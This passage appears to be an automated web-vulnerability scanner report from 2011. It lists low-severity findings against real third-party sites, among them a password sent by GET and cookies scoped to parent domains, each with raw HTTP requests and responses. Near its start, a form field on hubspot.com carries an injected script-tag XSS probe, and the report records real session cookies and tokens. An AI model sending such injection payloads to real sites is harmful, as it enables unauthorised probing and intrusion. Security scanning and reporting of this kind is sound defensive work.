9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0D&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0D&LeadGen_ContactForm_10273_m66219%3aLastName=%0D&LeadGen_ContactForm_10273_m66219%3aEmail=%0D&LeadGen_ContactForm_10273_m66219%3aPhone=%0D&LeadGen_ContactForm_10273_m66219%3aCompany=%0D&LeadGen_ContactForm_10273_m66219%3aWebsite=%0D&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0D16368%3Cscript%3Ealert(/DORK/)%3C%2fscript%3E396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0D&__dnnVariable=%0D&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12 HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: HUBSPOT130=68228268.20480.0000; hubspotutktzo=-5; CR_4630_0=220A3D5EDE8D1B64; hubspotdt=2011-05-15%2013%3A00%3A56; hubspotutk=1a7f20a0bbd044f2ba16c8ab07bafe6a; hubspotvd=1a7f20a0bbd044f2ba16c8ab07bafe6a; hubspotvw=1a7f20a0bbd044f2ba16c8ab07bafe6a; hubspotvm=1a7f20a0bbd044f2ba16c8ab07bafe6a; hsfirstvisit=http%3A%2F%2Fwww.hubspot.com%2Ffree-trial%2FDefault.aspx%3FRewriteStatus%3D1%26__VIEWSTATE%3D%252fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%252bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4J|http%3A%2F%2Fburp%2Fshow%2F2|2011-05-15%2013%3A00%3A22; __ar_v4=WU5STEO2IBFPDJIARLWYYE%3A20110514%3A2%7CYNYIFZAM3NACFPVLCC56LA%3A20110514%3A2%7CSNWCKNCH3JFBBA3BHHHZOL%3A20110514%3A2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 15 May 2011 17:01:19 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

9. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://gold.insidenetwork.com/facebook/gold/login.php

The form contains the following password field:

amember_pass

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

Response

10. Cookie scoped to parent domain previous next
There are 9 instances of this issue:

http://www.invisionpower.com/hosting/advanced.php
http://www.invisionpower.com/products/board/
http://www.invisionpower.com/suite/demo.php
https://www.invisionpower.com/clients/index.php
http://affiliate.invisionpower.com/scripts/track.php
http://bstats.adbrite.com/click/bstats.gif
http://dis.us.criteo.com/dis/dis.aspx
http://id.google.com/verify/EAAAAGvlWCaflY7x5P9Q8kubShs.gif
http://track.lfstmedia.com/cmp698

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://www.invisionpower.com/hosting/advanced.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.invisionpower.com
Path:	/hosting/advanced.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

maan_session_id=743b02bb18c51d83a80900a94b5dfdc1; path=/; domain=invisionpower.com; httponly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/advanced.php HTTP/1.1
Host: www.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/files/file/4226-rsyvarth-social-groups/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; maan_session_id=85182b43fa1fc5f365224d2744f2080d; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.3.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:27:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: maan_session_id=743b02bb18c51d83a80900a94b5dfdc1; path=/; domain=invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:27:53 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20952

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...

10.2. http://www.invisionpower.com/products/board/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.invisionpower.com
Path:	/products/board/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

maan_session_id=4588cf32a032cdc942b3b54c928f0119; path=/; domain=invisionpower.com; httponly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/board/ HTTP/1.1
Host: www.invisionpower.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:25:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: maan_session_id=4588cf32a032cdc942b3b54c928f0119; path=/; domain=invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:25:58 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20387

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...

10.3. http://www.invisionpower.com/suite/demo.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.invisionpower.com
Path:	/suite/demo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

maan_session_id=8eabddbf00dc642fec81c71681b64329; path=/; domain=invisionpower.com; httponly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /suite/demo.php HTTP/1.1
Host: www.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: maan_session_id=842de12878eb0d7b8c65162df86685ee; __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.1.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: maan_session_id=8eabddbf00dc642fec81c71681b64329; path=/; domain=invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:26:09 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 15103

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...

10.4. https://www.invisionpower.com/clients/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.invisionpower.com
Path:	/clients/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

maan_session_id=a4533e26a4bb6bff0bf247e222ebe94c; path=/; domain=invisionpower.com; httponly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.5. http://affiliate.invisionpower.com/scripts/track.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://affiliate.invisionpower.com
Path:	/scripts/track.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; expires=Wed, 12-May-2021 16:26:14 GMT; path=/; domain=.invisionpower.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/track.php?visitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o&tracking=1&url=H_www.invisionpower.com%2F%2Fsuite%2Fdemo.php&referrer=H_www.invisionpower.com%2Fproducts%2Fboard%2F&getParams=&anchor=&cookies= HTTP/1.1
Host: affiliate.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/suite/demo.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC"
Set-Cookie: PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; expires=Wed, 12-May-2021 16:26:14 GMT; path=/; domain=.invisionpower.com
Content-Length: 0
Content-Type: application/x-javascript

10.6. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

Apache="168362073x0.079+1305478400x1658903250"; path=/; domain=.adbrite.com; expires=Sat, 10-May-2031 16:53:20 GMT
srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 16-May-2011 16:53:20 GMT
ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiq2yK1MrDEsSiwwKK8xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 16:53:20 GMT
vsd=0@1@4dd00500@www.hubspot.com; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 16:53:20 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=47432242&bapid=10431&uid=680833 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: Apache="168362073x0.079+1305478400x1658903250"; path=/; domain=.adbrite.com; expires=Sat, 10-May-2031 16:53:20 GMT
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 16-May-2011 16:53:20 GMT
Set-Cookie: rb2=EAE; path=/; domain=.adbrite.com; expires=Sat, 13-Aug-2011 16:53:20 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiq2yK1MrDEsSiwwKK8xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 16:53:20 GMT
Set-Cookie: vsd=0@1@4dd00500@www.hubspot.com; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 16:53:20 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 15 May 2011 16:53:20 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.7. http://dis.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=acd30cad-abc2-4421-b93d-473e478e8829; domain=.criteo.com; expires=Sun, 15-May-2016 16:56:14 GMT; path=/
udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; domain=.criteo.com; expires=Tue, 15-Nov-2011 17:56:14 GMT; path=/
udi=*1VxJSydjTnc75s1tKJAp%2bvQ%3d%3d; domain=.criteo.com; expires=Mon, 16-May-2011 16:56:14 GMT; path=/
uic=*1MwVR6KMcAzACV3ax%2byDyPJ2xMtUJk7IIuuHiM4PLkmtoXghSJ%2fYPYDai6VYM0en%2b; domain=.criteo.com; expires=Tue, 15-Nov-2011 17:56:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?p1=v%3D2%26wi%3D7710485%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=1532&c=2&cb=8790051960 HTTP/1.1
Host: dis.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Sun, 15 May 2011 16:56:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: uid=acd30cad-abc2-4421-b93d-473e478e8829; domain=.criteo.com; expires=Sun, 15-May-2016 16:56:14 GMT; path=/
Set-Cookie: udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; domain=.criteo.com; expires=Tue, 15-Nov-2011 17:56:14 GMT; path=/
Set-Cookie: udi=*1VxJSydjTnc75s1tKJAp%2bvQ%3d%3d; domain=.criteo.com; expires=Mon, 16-May-2011 16:56:14 GMT; path=/
Set-Cookie: uic=*1MwVR6KMcAzACV3ax%2byDyPJ2xMtUJk7IIuuHiM4PLkmtoXghSJ%2fYPYDai6VYM0en%2b; domain=.criteo.com; expires=Tue, 15-Nov-2011 17:56:14 GMT; path=/
Content-Length: 9

<HTML/>

10.8. http://id.google.com/verify/EAAAAGvlWCaflY7x5P9Q8kubShs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAGvlWCaflY7x5P9Q8kubShs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=47=X0FYGmfTMyj1F459tNArdzOEBt_RZ2SblIezIj5PNBGR3jQME9gQohiVBgO7qW2uuK6LmpVtHT1ukJzdFNGFyH2UtPYO_X4n6dxuajnk48nYL-oftk6H-Nz9AjrWiY35; expires=Mon, 14-Nov-2011 16:25:52 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAGvlWCaflY7x5P9Q8kubShs.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ip+board+software
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=m1F73lFDPpRGZqSrEOdNE2JdpeyQ7mR8QK2EVMuvag=6WgzUMQsmx7KxYv_; PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy

Response

HTTP/1.1 200 OK
Set-Cookie: NID=47=X0FYGmfTMyj1F459tNArdzOEBt_RZ2SblIezIj5PNBGR3jQME9gQohiVBgO7qW2uuK6LmpVtHT1ukJzdFNGFyH2UtPYO_X4n6dxuajnk48nYL-oftk6H-Nz9AjrWiY35; expires=Mon, 14-Nov-2011 16:25:52 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 15 May 2011 16:25:52 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.9. http://track.lfstmedia.com/cmp698 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.lfstmedia.com
Path:	/cmp698

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

trx=ip3281-j1hk7ww8VzbRyoeL2te32g; Domain=.lfstmedia.com; Expires=Mon, 14-May-2012 16:53:18 GMT; Path=/
trs=ip3281-Pe89Bj0rDzZtYp1B2t1CwP; Domain=.lfstmedia.com; Path=/
adu=kFfviwdBGAG2fdQv1i6avvzeHSzTq9cE; Domain=.lfstmedia.com; Expires=Wed, 12-May-2021 16:53:18 GMT; Path=/
cs=ip731-EeyQdI8ersgihSDXNkHEDA; path=/; domain=.lfstmedia.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cmp698?cid=cmp698&dmCmp=36058&key=884&ad=crv2056&dmAd=38038&dmCrty=43151&adkey=0f7 HTTP/1.1
Host: track.lfstmedia.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sun, 15 May 2011 16:53:18 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Pragma: no-cache
Cache-Control: must-revalidate
Cache-Control: no-cache
Cache-Control: no-store
Expires: Sat, 01 Jan 2000 12:00:00 GMT
P3P: CP="CAO PSA OUR"
Set-Cookie: trx=ip3281-j1hk7ww8VzbRyoeL2te32g; Domain=.lfstmedia.com; Expires=Mon, 14-May-2012 16:53:18 GMT; Path=/
Set-Cookie: trs=ip3281-Pe89Bj0rDzZtYp1B2t1CwP; Domain=.lfstmedia.com; Path=/
